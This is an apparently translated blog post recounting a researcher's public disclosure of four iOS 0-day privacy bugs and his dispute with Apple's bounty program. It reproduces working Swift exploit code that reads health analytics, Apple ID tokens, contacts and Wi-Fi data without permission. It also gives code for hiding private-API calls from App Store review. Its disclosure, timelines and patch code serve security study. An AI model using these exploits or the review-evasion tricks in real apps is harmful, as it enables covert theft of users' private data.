I. Foreword

Hello everyone, today we have some Apple system vulnerability drama to follow!

On September 24, Denis Tokarev published a write-up of four iOS 0-day bugs. He complained that Apple never credited him in its security notes and, more importantly, never paid a bounty!

Here is the author's information:

  • Twitter: Denis Tokarev
  • GitHub: illusionofchaos
  • Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program / Habr

II. Background

Denis Tokarev is the real name of the researcher behind illusionofchaos. There is not much public information about him, but his website is written in Russian, so he is presumably Russian.

The author says he reported four 0-day vulnerabilities to Apple between March 10 and May 4 this year, but by the time he went public only one had been fixed (in iOS 14.7), and even that fix was not credited on Apple's iOS 14.7 security content page! When he raised this with Apple Product Security, they promised to list it on the page for the next system update, but it was not listed in the three subsequent releases. So the author was furious and decided to disclose everything, which is what produced today's earth-shaking news (drama)!

0-day

Also written 0day, 0-day, zero-day vulnerability or zero-hour vulnerability.

A zero-day vulnerability is a flaw the vendor has had "zero days" to fix: it is exploitable before any patch exists, and a zero-day attack is one that exploits it. Colloquially, the exploit shows up the same day the flaw becomes known. The real fix must come from the software vendor, which is usually slow, so anti-malware vendors often ship signatures in their latest definition updates to block known zero-day exploits without addressing the underlying vulnerability. Such attacks are typically sudden and destructive.


iOS 14.7 was released on July 19, 2021; on October 11, 2021, Apple released iOS 15.0.2, which fixed a second one of the four bugs.

Next, we first analyze the impact of these four vulnerabilities, then discuss Apple's security bounty program, and finally touch on iOS security more broadly.

iOS analyticsd pre-14.7 exploit

This bug was fixed in iOS 14.7.

Vulnerability impact

Allows any user-installed app to read the analytics logs (Settings -> Privacy -> Analytics & Improvements -> Analytics Data), which include (but are not limited to):

  • Medical information (heart rate, count of detected atrial fibrillation and irregular heart rhythm events)
  • Menstrual cycle length, biological sex and age, whether the user logs sexual activity, cervical mucus quality, etc.
  • Device usage information (device pickups, push notification counts, user actions in various contexts, etc.)
  • Screen time information and session counts for all applications, with their respective bundle IDs
  • Information about device accessories along with their manufacturer, model, firmware version and user-assigned name
  • Application crashes, with bundle ID and exception code
  • Languages of the web pages the user viewed in Safari

Vulnerability description

This vulnerability means an app can obtain the analytics logs without any permission, and since analytics logs exist on every system, there will certainly be sensitive information in them. The author also notes that all of this data is still collected even when "Share iPhone Analytics" is turned off in Settings. This editor did not verify that point; interested readers can check it themselves.

This vulnerability has been fixed in iOS 14.7, so the following examples of MotionUsageMetrics data were taken from a test device running iOS 14.2 (the screenshots are not reproduced here).

Vulnerability code

Exploit source code: GitHub (illusionofchaos/ios-analyticsd-pre14.7-exploit)

func analyticsJson() -> String {
    let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_string(xdict, "command", "log-dump")
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    return String(cString: xpc_dictionary_get_string(reply, "log-dump"))
}

XPC

XPC is a Mach-based IPC (inter-process communication) technology on macOS and iOS that provides privilege separation and rounds out the App Sandbox model. Note that on iOS the XPC C API is private (not available to App Store apps). Put simply, the system wraps many daemons as XPC services; each XPC service is an IPC endpoint, and any app that can reach its Mach service can send it messages, so the service itself is responsible for checking who is calling and what entitlements the caller holds. For the API functions and their descriptions, see:

  • XPC | Apple Developer Documentation
  • XPC Connections | Apple Developer Documentation
  • XPC · objc.io
  • objc China: XPC

Vulnerability analysis

With the basics of XPC in mind, you can probably guess what the source code above does. It talks to the system XPC service com.apple.analyticsd. Because the service does not verify the caller's entitlements, any app can use it.

Source code walkthrough:

func analyticsJson() -> String {
    // Create an XPC connection to the com.apple.analyticsd Mach service
    // (flags = 2, i.e. XPC_CONNECTION_MACH_SERVICE_PRIVILEGED)
    let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2)
    // Handler for connection events such as errors or invalidation; ignored here
    xpc_connection_set_event_handler(connection, { _ in })
    // The connection must be resumed before it will deliver messages
    xpc_connection_resume(connection)
    // Create the XPC dictionary that carries the request
    let xdict = xpc_dictionary_create(nil, nil, 0)
    // Key "command" with value "log-dump" asks the daemon to dump its logs
    xpc_dictionary_set_string(xdict, "command", "log-dump")
    // Send the message synchronously and wait for the reply
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    // Read the result string out of the reply
    return String(cString: xpc_dictionary_get_string(reply, "log-dump"))
}

If you want to build and run the source yourself, note that the C functions in the project's c.c file need to be modified to look like this:

#include <dlfcn.h>

// Call dlopen through a cast so the call site is just a function pointer
void * normal_function1(const char * arg1, int arg2) {
    return ((void* (*) (const char *, int)) ((long long)dlopen))(arg1, arg2);
}

// Same for dlsym
void * normal_function2(void * arg1, const char * arg2) {
    return ((void* (*) (void *, const char*)) ((long long)dlsym))(arg1, arg2);
}

Reporting timeline

  • April 29, 2021: Sent a detailed report to Apple
  • April 30, 2021: Apple replied that it had reviewed the report and was investigating
  • May 20, 2021: Asked Apple for a status update (no reply)
  • May 30, 2021: Asked Apple for a status update again
  • June 3, 2021: Apple replied that they plan to fix the issue in an upcoming update
  • July 19, 2021: iOS 14.7 released with the fix
  • July 20, 2021: Asked Apple for a status update
  • July 21, 2021: iOS 14.7 security content list published without mentioning this vulnerability (support.apple.com/zh-cn/HT212…)
  • July 22, 2021: Asked Apple why the bug is not on the list
  • Same day, received the following reply: "Due to a processing issue, your contribution will be included in the security page in an upcoming update. We apologize for the inconvenience."
  • July 26, 2021: iOS 14.7.1 security content list published, still no mention of this vulnerability (support.apple.com/zh-cn/HT212…)
  • September 13, 2021: iOS 14.8 security content list published, still no mention of this vulnerability (support.apple.com/zh-cn/HT212…)
  • September 20, 2021: iOS 15.0 security content list published, still no mention of this vulnerability (support.apple.com/zh-cn/HT212…)
  • September 24, 2021: Still no reply

Looking at this long timeline, Apple did not keep its promise. One can feel that the contribution got no recognition at all, which for the author was a painful experience.

iOS gamed exploit (fixed in 15.0.2)

This bug was fixed in iOS 15.0.2.

Vulnerability impact

Any app installed from the App Store can access the following data without the user's permission:

  • The Apple ID email and the full name associated with it
  • An Apple ID authentication token that allows access to at least one endpoint on *.apple.com on behalf of the user
  • Full file-system read access to the Core Duet database (contains a list of contacts from Mail, SMS, iMessage and third-party messaging apps, metadata about all the user's interactions with those contacts, including timestamps and statistics, and some attachments such as URLs and text)
  • Full file-system read access to the Speed Dial database and the Address Book database, including contact pictures and other metadata such as creation and modification dates (Tokarev: "I just checked on iOS 15 and this is not accessible, so it must have been quietly fixed recently")

Vulnerability description

This vulnerability allows reading the contents of the Core Duet, Speed Dial and Address Book databases without any permissions. Reading the user's Apple ID email additionally requires Game Center to be turned on under Settings -> Game Center.

Run example (screenshot not reproduced here).

Vulnerability code

Exploit source code: GitHub (illusionofchaos/ios-gamed-0day)

// Connect to gamed's Mach service; NSXPCConnection exposes it as an Objective-C proxy
let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
// Treat the remote object as the (private) GKDaemonProtocol interface
let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
let pid = ProcessInfo.processInfo.processIdentifier
// gamed hands back its service proxies without checking the caller's Game Center entitlement
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
    // Apple ID email and authentication token (only when Game Center is enabled)
    accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
        let appleID = response.credential.accountName
        let token = response.credential.authenticationToken
    })

    // Arbitrary file read outside the sandbox: the daemon opens whatever file URL it is given
    utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
        let addressBookData = data
    })
})

Vulnerability analysis

The root cause is that the XPC service com.apple.gamed does not properly check whether the calling app holds the com.apple.developer.game-center entitlement.

1. Even if the user has disabled Game Center on the device, calling getServicesForPID:localPlayer:reply: still returns several XPC proxy objects (GKAccountService, GKFriendService, GKUtilityService, and so on).

2. If Game Center is enabled on the user's device (even if the Game Center capability is not enabled for the app in App Store Connect and the app does not carry the com.apple.developer.game-center entitlement), then:

  • Calling authenticatePlayerWithExistingCredentialsWithHandler: on GKAccountService returns an object containing the user's Apple ID, DSID and a Game Center authentication token (which allows sending requests to gc.apple.com on the user's behalf).
  • Calling getProfilesForPlayerIDs:handler: on GKProfileService returns an object containing the first and last name from the user's Apple ID.
  • Calling getFriendsForPlayer:handler: on GKFriendService returns an object containing information about the user's Game Center friends.

3. Even if Game Center is disabled on the device, the Game Center capability is not enabled for the app in App Store Connect, and the app does not carry the com.apple.developer.game-center entitlement, calling requestImageDataForURL:subdirectory:fileName:handler: on GKUtilityService lets the app read arbitrary files outside its sandbox by passing a file URL to the method. Files that can be read this way include (but are not limited to):

  • /var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist: contains the information shown under Settings -> General -> About. On jailbroken devices this file can be edited to change the reported model, for example turning a Japanese or US regional model into an international one.
  • /var/mobile/Library/CoreDuet/People/interactionC.db: contains a list of contacts from Mail, SMS, iMessage and third-party messaging apps, plus metadata (including timestamps and statistics) about the user's interactions with those contacts
  • /var/mobile/Library/Preferences/com.apple.mobilephone.speeddial.plist: contains favorite contacts and their phone numbers
  • /var/mobile/Library/AddressBook/AddressBook.sqlitedb: contains the complete address book
  • /var/mobile/Library/AddressBook/AddressBookImages.sqlitedb: contains the contact pictures from the address book

Calling cacheImageData:inSubdirectory:withFileName:handler: on GKUtilityService may also allow writing arbitrary data to locations outside the app sandbox.

Reporting timeline

  • March 10, 2021: Reported the bug to Apple
  • March 10, 2021: Apple confirmed the report
  • May 20, 2021: Asked for a status update (no reply)
  • May 30, 2021: Asked for a status update again
  • July 1, 2021: Apple replied that they are still investigating
  • July 20, 2021: Asked for a status update again
  • August 25, 2021: Apple replied that they plan to fix the issue in an upcoming update

nehelper installed-app enumeration 0-day (still works in 15.0.2)

This bug had not been fixed as of iOS 15.0.2.

Vulnerability impact

This vulnerability allows any user-installed app to determine, given a bundle ID, whether that app is installed on the device.

Vulnerability description

No permission of any kind is required to find out whether a given app is installed on the device.

Run example (screenshot not reproduced here).

Vulnerability code

Exploit source code: GitHub (illusionofchaos/ios-nehelper-enum-apps-0day)

func isAppInstalled(bundleId: String) -> Bool {
    let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)!
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    // Select the cache manager delegate and its "look up by signing identifier" command
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 1)
    xpc_dictionary_set_uint64(xdict, "cache-command", 3)
    xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId)
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    // A cache-app-uuid in the reply means an app with that bundle ID is installed
    if let resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") != nil {
        return true
    }
    return false
}

Vulnerability analysis

This code should be readable after the previous walkthrough. The XPC service com.apple.nehelper exposes a method reachable from any app that takes a bundle ID as its parameter and returns an array containing some cache UUIDs if an app with that bundle ID is installed, or an empty array otherwise. The request is handled in the -[NEHelperCacheManager onQueueHandleMessage:] method of /usr/libexec/nehelper.

Reporting timeline

  • May 4, 2021: Reported the vulnerability to Apple
  • May 4, 2021: Apple confirmed the report
  • May 20, 2021: Asked for a status update (no reply)
  • July 20, 2021: Asked for a status update again
  • August 12, 2021: Apple replied that it is still investigating

nehelper Wi-Fi info 0-day (still works in 15.0.2)

This bug had not been fixed as of iOS 15.0.2.

Vulnerability impact

This vulnerability allows an app that has been granted location access to read the SSID and BSSID of the Wi-Fi network the device is currently connected to, without the entitlement normally required for that.

Vulnerability description

Once the app has obtained the "Precise Location" permission, it can read the SSID and BSSID of the currently connected Wi-Fi network.

Run example (screenshot not reproduced here).

Vulnerability code

Exploit source code: GitHub (illusionofchaos/ios-nehelper-wifi-info-0day)

func wifi_info() -> String? {
    let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10)
    // A small sdk-version (at most 524288) makes nehelper skip the wifi-info entitlement check
    xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely
    xpc_dictionary_set_string(xdict, "interface-name", "en0")
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    if let result = xpc_dictionary_get_value(reply, "result-data") {
        let ssid = String(cString: xpc_dictionary_get_string(result, "SSID"))
        let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID"))
        return "SSID: \(ssid)\nBSSID: \(bssid)"
    } else {
        return nil
    }
}

Vulnerability analysis

The XPC service com.apple.nehelper accepts a user-supplied sdk-version parameter, and if its value is less than or equal to 524288 the check for the com.apple.developer.networking.wifi-info entitlement is skipped. This lets any app that otherwise qualifies (for example by holding location access) read Wi-Fi information without the required entitlement. The check lives in the -[NEHelperWiFiInfoManager checkIfEntitled:] method of /usr/libexec/nehelper.

Reporting timeline

  • May 2, 2021: Reported the vulnerability to Apple
  • May 4, 2021: Apple confirmed the report
  • May 20, 2021: Asked for a status update (no reply)
  • July 20, 2021: Asked for a status update again
  • August 6, 2021: Apple replied that it is still investigating

Apple Security Bounty program

The Apple Security Bounty program rewards researchers who report critical security issues.

  • Apple Security Bounty

Researchers who report issues in iOS, iPadOS, macOS, tvOS, watchOS and iCloud can earn up to $1.5 million. Apple also publicly acknowledges those who submit valid reports, and if the recipient donates the reward to a qualifying charity, Apple matches the donation.

The author argues that the illusionofchaos/ios-gamed-0day vulnerability should be worth $100,000 according to the Apple Security Bounty payout page ("Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox"), where "sensitive data" access includes gaining broad access to Contacts, i.e. the full database.

TCC (Transparency, Consent, and Control) prompts are the consent dialogs behind the permissions managed in the Privacy tab under Security & Privacy in macOS System Preferences (and under Settings -> Privacy on iOS).

The author says he is not the first to be unhappy with Apple's security bounty program. Here are some other reports and comments:

  • therecord.media/researcher-…
  • wojciechregula.blog/post/change…
  • medium.com/macoclock/a…
  • thezerohack.com/apple-vulne…
  • www.imore.com/developer-f…
  • gigazine.net/gsc_news/en…
  • zemnmez.medium.com/how-to-hack…
  • theevilbit.github.io/posts/exper…
  • twitter.com/5n1p3r0010/…
  • twitter.com/theevilbit/…
  • twitter.com/osxreverser…

Vulnerability impact

First, from the analysis above, the most damaging bug, the com.apple.gamed XPC vulnerability, was fixed in iOS 15.0.2, but devices on 15.0.1 or earlier should be considered exposed. The harm is self-evident.

In addition, the author anticipated the objection that such exploit code could never make it into the App Store given Apple's strict automated and human review, and refuted it.

Imagine that the government of a country where homosexuality is punishable by death has an official app in the App Store, used by most of its citizens, and wants to target people based on their sexual orientation. It could do so, for example, by checking whether the Grindr app is installed on the user's device. The government could hide the malicious code in its official app and ship it as an update through the App Store, and Apple would not be able to detect it.

As is well known, packages uploaded to the App Store are analyzed statically: the strings in the binary are checked against a predefined list of private APIs. But if the API is Objective-C, it can be invoked dynamically through the Objective-C runtime.

In the public exploit source, the author shows how to call C functions that Apple treats as private API dynamically, so that static analysis does not spot them. Sample code:

let dylib = normal_function1(["/usr/lib/system/libxp", ".dylib"].joined(separator: "c"), 0)
let normalFunction3 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_create_mach_service"].joined(separator: "c")), to: (@convention(c) (UnsafePointer<CChar>, DispatchQueue?, UInt64) -> OpaquePointer).self)
let normalFunction4 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_set_event_handler"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, @escaping (OpaquePointer) -> Void) -> Void).self)

dlopen and dlsym are system library functions that load dynamic libraries and resolve symbols. Using them might itself be noticed by the App Review team, but the author notes you can avoid calling them directly. Every iOS binary imports a symbol called dyld_stub_binder, which lives in the same library as dlopen and dlsym (libdyld). That means we can find dlopen and dlsym at a fixed distance from dyld_stub_binder in memory and call them using nothing but their addresses. The offsets are computed ahead of time for a given iOS version and device model (see the c.c file in the source):

#include <dlfcn.h>
#include <stdio.h>

extern void dyld_stub_binder(void); // imported by every iOS binary, same library as dlopen/dlsym

// Print the distances to embed as constants for this OS version and device model
printf("%lld\n", (long long)dyld_stub_binder - (long long)dlopen);
printf("%lld\n", (long long)dyld_stub_binder - (long long)dlsym);

More sophisticated malware can avoid hard-coded offsets altogether and locate these functions dynamically by matching their code signatures. We won't expand on that here; interested readers can look into FFI.

Of course, the strings holding the function names should also be obfuscated so that static analysis does not catch them. Much more could be written about this.
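The two tricks described above, modeled in portable C as an added example (this is not code from the original post or from Tokarev's repositories). Here strlen and strcmp stand in for dyld_stub_binder and dlsym: both are exported by the same C library, so their distance is a per-build constant just like the libdyld offsets, and the program measures it in-process so it can check itself, where real malware would embed the printed number. The string table and the scanner are constructed stand-ins for the binary's string section and for App Review's private-API string check; nothing here talks to a real Apple daemon.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the post or from illusionofchaos' repos.
 * strlen() is the "anchor" that legitimately appears in the import table;
 * strcmp() is the "target" we want to reach without ever naming it. */

typedef int (*strcmp_fn)(const char *, const char *);

/* "Build time": measure the anchor-to-target distance once per library build.
 * Within one mapped image this distance does not change under ASLR, which is
 * why a constant per (OS version, device model) works on the real target. */
intptr_t measure_offset(void)
{
    return (intptr_t)((uintptr_t)strcmp - (uintptr_t)strlen);
}

/* "Run time": rebuild the target pointer from the anchor plus the constant.
 * Real malware passes a hard-coded number here; the target is never imported. */
strcmp_fn resolve_via_anchor(intptr_t offset)
{
    return (strcmp_fn)((uintptr_t)strlen + (uintptr_t)offset);
}

int compare_via_resolved(const char *a, const char *b)
{
    strcmp_fn f = resolve_via_anchor(measure_offset());
    return f(a, b);
}

/* String-splitting half. These fragments are what actually lands in the
 * binary's string table; "strcmp" is never stored contiguously, mirroring
 * ["xp", "_connection_create_mach_service"].joined(separator: "c"). */
static const char *const FRAGMENTS[] = { "str", "mp" };
static const char JOINER[] = "c";
#define NFRAGMENTS (sizeof FRAGMENTS / sizeof FRAGMENTS[0])

/* Reassemble the symbol name at run time; returns its length. */
size_t assemble_name(char *out, size_t cap)
{
    size_t pos = 0;
    for (size_t i = 0; i < NFRAGMENTS; i++) {
        int w = snprintf(out + pos, cap - pos, "%s%s", i ? JOINER : "", FRAGMENTS[i]);
        if (w < 0 || (size_t)w >= cap - pos)
            break;
        pos += (size_t)w;
    }
    return pos;
}

/* Constructed stand-in for the binary's string table: each literal
 * NUL-terminated and laid back to back, as a compiler would emit them. */
size_t build_mock_string_table(char *buf, size_t cap)
{
    size_t off = 0;
    for (size_t i = 0; i < NFRAGMENTS; i++) {
        size_t len = strlen(FRAGMENTS[i]) + 1;
        if (off + len > cap)
            break;
        memcpy(buf + off, FRAGMENTS[i], len);
        off += len;
    }
    return off;
}

/* Model of the reviewer's static check: does an exact private-API name
 * occur as one entry of the string table? The split name defeats it. */
int string_table_contains(const char *table, size_t len, const char *name)
{
    size_t off = 0;
    while (off < len) {
        const char *entry = table + off;
        if (strcmp(entry, name) == 0)
            return 1;
        off += strlen(entry) + 1;
    }
    return 0;
}

int main(void)
{
    char name[64], table[64];
    size_t tlen = build_mock_string_table(table, sizeof table);
    assemble_name(name, sizeof name);
    printf("offset strlen -> strcmp: %lld\n", (long long)measure_offset());
    printf("assembled name: %s\n", name);
    printf("scanner finds \"%s\" in string table: %s\n", name,
           string_table_contains(table, tlen, name) ? "yes" : "no");
    printf("resolved strcmp(\"abc\", \"abd\") = %d\n", compare_via_resolved("abc", "abd"));
    return 0;
}
```

Build with `cc -o evade evade.c && ./evade`. The scanner reports "no" because only "str" and "mp" exist as entries, and the comparison still works because the call goes through strlen plus the measured offset. The defensive lesson is the same one the post draws: a string denylist over the binary is a weak gate, and the daemon on the other end of the connection must enforce the entitlement itself.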

Fixes and mitigations

As mentioned earlier, if you are running a version earlier than iOS 15.0.2, it is best to turn off Game Center, not grant the "Precise Location" permission, and upgrade to the latest system as soon as possible.

Of course, unknown links and apps not installed from the App Store are also very risky. As shown above, your information may be obtained without your consent, and if you think it is only basic information, you are being careless. A system flaw could just as well expose the verification codes in your SMS app, and then an attacker has your phone number plus the code. Every user today should be aware of these risks, to protect both their devices and their data and property.

Of the four bugs, Apple left two unfixed, and a developer then posted on Reddit that he had written a jailbreak tweak to work around them!

The tweak's source code is at rllbe/entitlementfix: Workaround for the 4 0-days:

%hook GKAccountService
-(void)authenticatePlayerWithExistingCredentialsWithHandler:(void(^)(GKAuthenticateResponse *, NSError *))handler {
    // Wrap the original completion handler so the response can be filtered
    void (^_handler)(GKAuthenticateResponse *, NSError *) = ^(GKAuthenticateResponse *response, NSError *error) {
        // Strip the credential unless the calling client holds the entitlements gamed should have required
        if (response && ![[[self clientProxy] entitlements] hasEntitlements:[%c(GKAccountServicePrivate) requiredEntitlements]]) {
            response.credential = nil;
            response.passwordChangeURL = nil;
        }
        handler(response, error);
    };
    %orig(_handler);
}
%end

This is the fix for the com.apple.gamed vulnerability: before returning any data, it verifies that the client's code object holds the entitlements the XPC service should have demanded.

This is the fix for the installed-app enumeration bug:

%hook NEHelperCacheManager
-(void)onQueueHandleMessage:(xpc_object_t)xdict {
    // cache-command 3 is the "is this bundle ID installed" lookup used by the exploit
    if (xpc_dictionary_get_uint64(xdict, "cache-command") == 3uLL) {
        Class NEHelperServer = %c(NEHelperServer);
        // Require a private entitlement on the calling connection; otherwise reply with an error (22 = EINVAL) and drop the request
        if (![NEHelperServer verifyConnection:xpc_dictionary_get_remote_connection(xdict) hasEntitlement:@"com.apple.private.nehelper.privileged"]) {
            [NEHelperServer sendReplyForMessage:xdict result:22LL data:0LL];
            return;
        }
    }
    return %orig;
}
%end

Fix for the Wi-Fi info vulnerability:

%hook NEHelperWiFiInfoManager
-(BOOL)checkIfEntitled:(NSUInteger)sdkVersion {
    // Clamp the caller-supplied sdk-version so a tiny value cannot select the legacy path that skips the entitlement check
    NSUInteger _sdkVersion = sdkVersion <= 1 << 19 ? 1 << 19 : sdkVersion;
    return %orig(_sdkVersion);
}
%end

Perhaps this is also an advantage of jailbreaking: it exploits system vulnerabilities itself, yet in the end it can patch vulnerabilities for the system, with no system update required. Sounds like a joke.

Conclusion

After following this drama, I believe there are many more vulnerabilities out there that have not been disclosed, or that someone has already found!

I won't comment much on Apple's bug bounty program itself; such programs are meant to be a "win-win" with security researchers, and other large companies run similar ones. But large enterprises tend to follow standardized processes, so Apple either did not respond to the researcher's questions or did not respond in time. Apple's slowness can be felt in everyday dealings as well. And whether a report qualifies for a payout under the bounty program is an opaque process. All of this led the author to publicly disclose vulnerabilities he valued at $100,000!

What this incident shows is that security problems are never a small matter, and when user information leaks, it can affect the user directly. These four vulnerabilities are just the tip of the iceberg: iOS security is only relative. So, from the user's perspective, don't click unknown links, don't install unknown apps, and keep your system updated to the latest version; that may be the safest course.

References

  • Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program / Habr
  • How malware gets into the App Store and why Apple can't stop that / Habr
  • Denis Tokarev (@illusionofcha0s) / Twitter
  • illusionofchaos/ios-gamed-0day: iOS gamed exploit (fixed in 15.0.2)
  • illusionofchaos/ios-nehelper-enum-apps-0day: iOS 15 0-day exploit (still works in 15.0.2)
  • illusionofchaos/ios-nehelper-wifi-info-0day: iOS 15 0-day exploit (still works in 15.0.2)
  • illusionofchaos/ios-analyticsd-pre14.7-exploit: iOS exploit (fixed in 14.7)
  • XPC | Apple Developer Documentation
  • XPC Connections | Apple Developer Documentation
  • XPC · objc.io
  • objc China: XPC
  • About the security content of iOS 14.7 and iPadOS 14.7, Apple Support (China)
  • Apple security updates, Apple Support (China)
  • Zero-day attack, Wikipedia, the free encyclopedia
  • Apple Security Bounty, Apple Developer
  • Apple Security Bounty: Payouts, Apple Developer
  • Reporting Security or Privacy Vulnerabilities, Apple Support (China)
  • [Free Release] EntitlementFix: Workaround for the 3 zero-day exploits posted here today : jailbreak
  • rllbe/entitlementfix: Workaround for the 4 0-days
  • Jailbreak #001: gamed 0-day vulnerability
  • macOS is finally starting to fix a big hole in XPC
  • Can macOS TCC still protect users' privacy
  • Apple has fixed a zero-day bug in the official release of iOS 15.0.2, but did not thank the security researcher, IT Home
  • White hat hacker Slipper completed the world's first public remote jailbreak of Apple's iPhone 13 Pro in just one second, IT Home
  • macOS 10.15.3 RCE
  • [Discussion] So apparently 3 zero-day exploits have been released. : jailbreak